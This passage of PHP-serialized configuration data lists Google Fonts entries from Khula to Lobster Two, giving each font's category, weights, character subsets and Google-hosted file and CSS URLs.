7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:62:"http://fonts.gstatic.com/s/khula/v1/_1LySU5Upq-sc4OZ1b_GIw.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/khula/v1/izcPIFyCSd16XI1Ak_Wk7Q.ttf";i:600;s:62:"http://fonts.gstatic.com/s/khula/v1/4ZH86Hce-aeFDaedTnbkbg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/khula/v1/UGVExGl-Jjs-YPpGv-MZ6w.ttf";i:800;s:62:"http://fonts.gstatic.com/s/khula/v1/Sccp_oOo8FWgbx5smie7xQ.ttf";}s:4:"urls";a:5:{i:300;s:49:"https://fonts.googleapis.com/css?family=Khula:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Khula:regular";i:600;s:49:"https://fonts.googleapis.com/css?family=Khula:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Khula:700";i:800;s:49:"https://fonts.googleapis.com/css?family=Khula:800";}}s:8:"kite_one";a:7:{s:4:"name";s:8:"Kite One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/kiteone/v4/8ojWmgUc97m0f_i6sTqLoQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Kite+One:regular";}}s:7:"knewave";a:7:{s:4:"name";s:7:"Knewave";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/knewave/v5/KGHM4XWr4iKnBMqzZLkPBg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Knewave:regular";}}s:9:"kotta_one";a:7:{s:4:"name";s:9:"Kotta One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/kottaone/v4/AB2Q7hVw6niJYDgLvFXu5w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Kotta+One:regular";}}s:6:"koulen";a:7:{s:4:"name";s:6:"Koulen";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/koulen/v10/AAYOK8RSRO7FTskTzFuzNw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Koulen:regular";}}s:6:"kranky";a:7:{s:4:"name";s:6:"Kranky";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/kranky/v6/C8dxxTS99-fZ84vWk8SDrg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Kranky:regular";}}s:5:"kreon";a:7:{s:4:"name";s:5:"Kreon";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{i:300;s:62:"http://fonts.gstatic.com/s/kreon/v9/HKtJRiq5C2zbq5N1IX32sA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/kreon/v9/zA_IZt0u0S3cvHJu-n1oEg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/kreon/v9/jh0dSmaPodjxISiblIUTkw.ttf";}s:4:"urls";a:3:{i:300;s:49:"https://fonts.googleapis.com/css?family=Kreon:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Kreon:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Kreon:700";}}s:6:"kristi";a:7:{s:4:"name";s:6:"Kristi";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/kristi/v7/aRsgBQrkQkMlu4UPSnJyOQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Kristi:regular";}}s:9:"krona_one";a:7:{s:4:"name";s:9:"Krona One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/kronaone/v4/zcQj4ljqTo166AdourlF9w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Krona+One:regular";}}s:9:"kumar_one";a:7:{s:4:"name";s:9:"Kumar One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/kumarone/v1/YmcJD6Wky1clGYY5OD-BkQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Kumar+One:regular";}}s:17:"kumar_one_outline";a:7:{s:4:"name";s:17:"Kumar One Outline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/kumaroneoutline/v1/hnQF47H-55qiLAGgq7C3QyxhoCTLJoiJ-y-zew8F8j0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Kumar+One+Outline:regular";}}s:6:"kurale";a:7:{s:4:"name";s:6:"Kurale";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";i:3;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/kurale/v1/rxeyIcvQlT4XAWwNbXFCfw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Kurale:regular";}}s:15:"la_belle_aurore";a:7:{s:4:"name";s:15:"La Belle Aurore";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/labelleaurore/v7/Irdbc4ASuUoWDjd_Wc3md123K2iuuhwZgaKapkyRTY8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=La+Belle+Aurore:regular";}}s:5:"laila";a:7:{s:4:"name";s:5:"Laila";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:62:"http://fonts.gstatic.com/s/laila/v2/bLbIVEZF3IWSZ-in72GJvA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/laila/v2/6iYor3edprH7360qtBGoag.ttf";i:500;s:62:"http://fonts.gstatic.com/s/laila/v2/tkf8VtFvW9g3VsxQCA6WOQ.ttf";i:600;s:62:"http://fonts.gstatic.com/s/laila/v2/3EMP2L6JRQ4GaHIxCldCeA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/laila/v2/R7P4z1xjcjecmjZ9GyhqHQ.ttf";}s:4:"urls";a:5:{i:300;s:49:"https://fonts.googleapis.com/css?family=Laila:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Laila:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Laila:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Laila:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Laila:700";}}s:11:"lakki_reddy";a:7:{s:4:"name";s:11:"Lakki Reddy";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/lakkireddy/v3/Q5EpFa91FjW37t0FCnedaKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Lakki+Reddy:regular";}}s:7:"lalezar";a:7:{s:4:"name";s:7:"Lalezar";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/lalezar/v1/k4_MPf09PGmL7oyGdPKwcg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Lalezar:regular";}}s:8:"lancelot";a:7:{s:4:"name";s:8:"Lancelot";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/lancelot/v6/XMT7T_oo_MQUGAnU2v-sdA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Lancelot:regular";}}s:6:"lateef";a:7:{s:4:"name";s:6:"Lateef";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/lateef/v10/PAsKCgi1qc7XPwvzo_I-DQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Lateef:regular";}}s:4:"lato";a:7:{s:4:"name";s:4:"Lato";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"700";i:7;s:9:"700italic";i:8;s:3:"900";i:9;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:10:{i:100;s:62:"http://fonts.gstatic.com/s/lato/v11/Upp-ka9rLQmHYCsFgwL-eg.ttf";s:9:"100italic";s:62:"http://fonts.gstatic.com/s/lato/v11/zLegi10uS_9-fnUDISl0KA.ttf";i:300;s:62:"http://fonts.gstatic.com/s/lato/v11/Ja02qOppOVq9jeRjWekbHg.ttf";s:9:"300italic";s:62:"http://fonts.gstatic.com/s/lato/v11/dVebFcn7EV7wAKwgYestUg.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/lato/v11/h7rISIcQapZBpei-sXwIwg.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/lato/v11/P_dJOFJylV3A870UIOtr0w.ttf";i:700;s:62:"http://fonts.gstatic.com/s/lato/v11/iX_QxBBZLhNj5JHlTzHQzg.ttf";s:9:"700italic";s:62:"http://fonts.gstatic.com/s/lato/v11/WFcZakHrrCKeUJxHA4T_gw.ttf";i:900;s:62:"http://fonts.gstatic.com/s/lato/v11/8TPEV6NbYWZlNsXjbYVv7w.ttf";s:9:"900italic";s:62:"http://fonts.gstatic.com/s/lato/v11/draWperrI7n2xi35Cl08fA.ttf";}s:4:"urls";a:10:{i:100;s:48:"https://fonts.googleapis.com/css?family=Lato:100";s:9:"100italic";s:54:"https://fonts.googleapis.com/css?family=Lato:100italic";i:300;s:48:"https://fonts.googleapis.com/css?family=Lato:300";s:9:"300italic";s:54:"https://fonts.googleapis.com/css?family=Lato:300italic";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Lato:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Lato:italic";i:700;s:48:"https://fonts.googleapis.com/css?family=Lato:700";s:9:"700italic";s:54:"https://fonts.googleapis.com/css?family=Lato:700italic";i:900;s:48:"https://fonts.googleapis.com/css?family=Lato:900";s:9:"900italic";s:54:"https://fonts.googleapis.com/css?family=Lato:900italic";}}s:13:"league_script";a:7:{s:4:"name";s:13:"League Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/leaguescript/v7/wnRFLvfabWK_DauqppD6vSeUSrabuTpOsMEiRLtKwk0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=League+Script:regular";}}s:12:"leckerli_one";a:7:{s:4:"name";s:12:"Leckerli One";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/leckerlione/v7/S2Y_iLrItTu8kIJTkS7DrC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Leckerli+One:regular";}}s:6:"ledger";a:7:{s:4:"name";s:6:"Ledger";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ledger/v4/G432jp-tahOfWHbCYkI0jw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Ledger:regular";}}s:6:"lekton";a:7:{s:4:"name";s:6:"Lekton";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/lekton/v7/r483JYmxf5PjIm4jVAm8Yg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/lekton/v7/_UbDIPBA1wDqSbhp-OED7A.ttf";i:700;s:63:"http://fonts.gstatic.com/s/lekton/v7/WZw-uL8WTkx3SBVfTlevXQ.ttf";}s:4:"urls";a:3:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Lekton:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Lekton:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Lekton:700";}}s:5:"lemon";a:7:{s:4:"name";s:5:"Lemon";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/lemon/v5/wed1nNu4LNSu-3RoRVUhUw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Lemon:regular";}}s:8:"lemonada";a:7:{s:4:"name";s:8:"Lemonada";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:4:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:4:{i:300;s:86:"http://fonts.gstatic.com/s/lemonada/v2/uM3MufQOcwGHuruj4TsXiqCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/lemonada/v2/pkzws3AUXmaaAzOi7aydSQ.ttf";i:600;s:86:"http://fonts.gstatic.com/s/lemonada/v2/9Vd4MNKsOxNyLzlfTXdKLqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:86:"http://fonts.gstatic.com/s/lemonada/v2/9jKcm4hRI511-Dy7FFfQ3aCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{i:300;s:52:"https://fonts.googleapis.com/css?family=Lemonada:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Lemonada:regular";i:600;s:52:"https://fonts.googleapis.com/css?family=Lemonada:600";i:700;s:52:"https://fonts.googleapis.com/css?family=Lemonada:700";}}s:17:"libre_baskerville";a:7:{s:4:"name";s:17:"Libre Baskerville";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/librebaskerville/v4/pR0sBQVcY0JZc_ciXjFsKyyZRYCSvpCzQKuMWnP5NDY.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/librebaskerville/v4/QHIOz1iKF3bIEzRdDFaf5QnhapNS5Oi8FPrBRDLbsW4.ttf";i:700;s:94:"http://fonts.gstatic.com/s/librebaskerville/v4/kH7K4InNTm7mmOXXjrA5v-xuswJKUVpBRfYFpz0W3Iw.ttf";}s:4:"urls";a:3:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Libre+Baskerville:regular";s:6:"italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Baskerville:italic";i:700;s:61:"https://fonts.googleapis.com/css?family=Libre+Baskerville:700";}}s:14:"libre_franklin";a:7:{s:4:"name";s:14:"Libre Franklin";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/zrsyK9EytLQ07oRM9IZIsX6Zf0VB_l-7q6pFtcZSRCs.ttf";s:9:"100italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/LHzsuUmxr4UY-IoiG8pRK4gsWNE1DYiT_eIOcNe2Au4.ttf";i:200;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yCwKTB4uIbnDXE2hyxZaFPY.ttf";s:9:"200italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqho0lu1sSkaQaYEjN61aJ3i1I.ttf";i:300;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yMhKJW3W9-339CFS_Lie1us.ttf";s:9:"300italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqho14je5cfhxzx5bEvSaoyQQI.ttf";s:7:"regular";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/PFwjf3aDdAQPvNKUrT3U7_fSnedoLXQQjURyDxluu8g.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/zrsyK9EytLQ07oRM9IZIsX5kKxjpQfTpnFf2SrDLxlg.ttf";i:500;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yMBjwrbmxH6gp8HgxjPD8qo.ttf";s:9:"500italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqho5VcuOW5XbZIr02vW37iuvg.ttf";i:600;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yORt4MKdIUjA60qLK3wI2m8.ttf";s:9:"600italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqhowNPRgU5g4Xymf9hgRWrbNs.ttf";i:700;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yEnStGWSv3WdwjmyyI8xc7Q.ttf";s:9:"700italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqhow7kn3RFjf4gfwsdsBE-Rf4.ttf";i:800;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yKltwG0cydF-uC1kFVv1hts.ttf";s:9:"800italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqho80d7u0uHUbaRkK-cNyim1w.ttf";i:900;s:91:"http://fonts.gstatic.com/s/librefranklin/v1/1_DGDtljMiPWFs5rl_p0yF7duMYIKwoQ5QsTL00fobw.ttf";s:9:"900italic";s:91:"http://fonts.gstatic.com/s/librefranklin/v1/7_V210XP3LBEtEwiCTqho0THpHUXJVnEwH4tSjkF0wg.ttf";}s:4:"urls";a:18:{i:100;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:100";s:9:"100italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:100italic";i:200;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:200";s:9:"200italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:200italic";i:300;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:300";s:9:"300italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:300italic";s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Libre+Franklin:regular";s:6:"italic";s:61:"https://fonts.googleapis.com/css?family=Libre+Franklin:italic";i:500;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:500";s:9:"500italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:500italic";i:600;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:600";s:9:"600italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:600italic";i:700;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:700";s:9:"700italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:700italic";i:800;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:800";s:9:"800italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:800italic";i:900;s:58:"https://fonts.googleapis.com/css?family=Libre+Franklin:900";s:9:"900italic";s:64:"https://fonts.googleapis.com/css?family=Libre+Franklin:900italic";}}s:11:"life_savers";a:7:{s:4:"name";s:11:"Life Savers";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/lifesavers/v6/g49cUDk4Y1P0G5NMkMAm7qCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:88:"http://fonts.gstatic.com/s/lifesavers/v6/THQKqChyYUm97rNPVFdGGXe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Life+Savers:regular";i:700;s:55:"https://fonts.googleapis.com/css?family=Life+Savers:700";}}s:10:"lilita_one";a:7:{s:4:"name";s:10:"Lilita One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/lilitaone/v4/vTxJQjbNV6BCBHx8sGDCVvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Lilita+One:regular";}}s:15:"lily_script_one";a:7:{s:4:"name";s:15:"Lily Script One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/lilyscriptone/v4/uPWsLVW8uiXqIBnE8ZwGPDjVlsJB_M_Q_LtZxsoxvlw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Lily+Script+One:regular";}}s:9:"limelight";a:7:{s:4:"name";s:9:"Limelight";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/limelight/v7/5dTfN6igsXjLjOy8QQShcg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Limelight:regular";}}s:11:"linden_hill";a:7:{s:4:"name";s:11:"Linden Hill";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/lindenhill/v6/UgsC0txqd-E1yjvjutwm_KCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/lindenhill/v6/OcS3bZcu8vJvIDH8Zic83keOrDcLawS7-ssYqLr2Xp4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Linden+Hill:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Linden+Hill:italic";}}s:7:"lobster";a:7:{s:4:"name";s:7:"Lobster";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/lobster/v18/9LpJGtNuM1D8FAZ2BkJH2Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Lobster:regular";}}s:11:"lobster_two";a:7:{s:4:"name";s:11:"Lobster Two";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/lobstertwo/v9/xb9aY4w9ceh8JRzobID1naCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/lobstertwo/v9/Ul_16MSbfayQv1I4QhLEoEeOrDcLawS7-ssYqLr2Xp4.ttf";i:700;s:88:"http://fonts.gstatic.com/s/lobstertwo/v9/bmdxOflBqMqjEC0-kGsIiHe1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/lobstertwo/v9/LEkN2_no_6kFvRfiBZ8xpM_zJjSACmk0BRPxQqhnNLU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Lobster+Two:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Lobster+Two:italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Lobster+Two:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Lobster+Two:700italic";}}s:16:"londrina_outline";a:7:{s:4:"name";s:16:"Londrina 